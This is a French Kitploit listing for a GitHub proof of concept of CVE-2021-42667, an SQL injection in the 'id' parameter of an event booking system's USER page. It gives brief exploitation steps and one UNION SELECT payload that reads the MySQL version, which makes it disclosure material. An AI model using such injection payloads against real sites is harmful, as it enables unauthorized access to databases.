Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-42667 — CVE-2021-42667 - Vulnérabilité d'injection SQL dans le système de réservation d'événements en ligne. | Kitploit
Outils/GitHubGitHub/0xdeku/cve-2021-42667
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionSécurité des Bases de Données
GitHub0xdeku/cve-2021-42667

CVE-2021-42667

CVE-2021-42667 - Vulnérabilité d'injection SQL dans le système de réservation d'événements en ligne.

Voir le dépôt
2il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-42667

CVE-2021-42667 - Vulnérabilité d'injection SQL dans le système de réservation et de réservation d'événements en ligne version 2.3.0.

Description technique :

Une vulnérabilité d'injection SQL existe dans le logiciel de gestion d'événements version 2.3.0. Un attaquant peut exploiter le paramètre vulnérable "id" dans la page web "USER" afin de manipuler la requête SQL effectuée. En conséquence, l'attaquant peut extraire des données sensibles du serveur web.

Page vulnérable - USER

Paramètre vulnérable - "id"

Étapes pour exploiter :

  1. Naviguez vers http://localhost/event-management/views/?v=USER&ID=1
  2. Insérez votre payload dans le paramètre id

Preuve de concept (PoC) -

Le payload suivant vous permettra d'extraire la version du serveur MySQL exécutée sur le serveur web -

root@kitploit:~
UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL;-- -

CVE-2021-42667

Références -

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42667

https://nvd.nist.gov/vuln/detail/CVE-2021-42667

Découvert par -

Alon Leviev (0xDeku), 22 octobre 2021.

Télécharger l’outil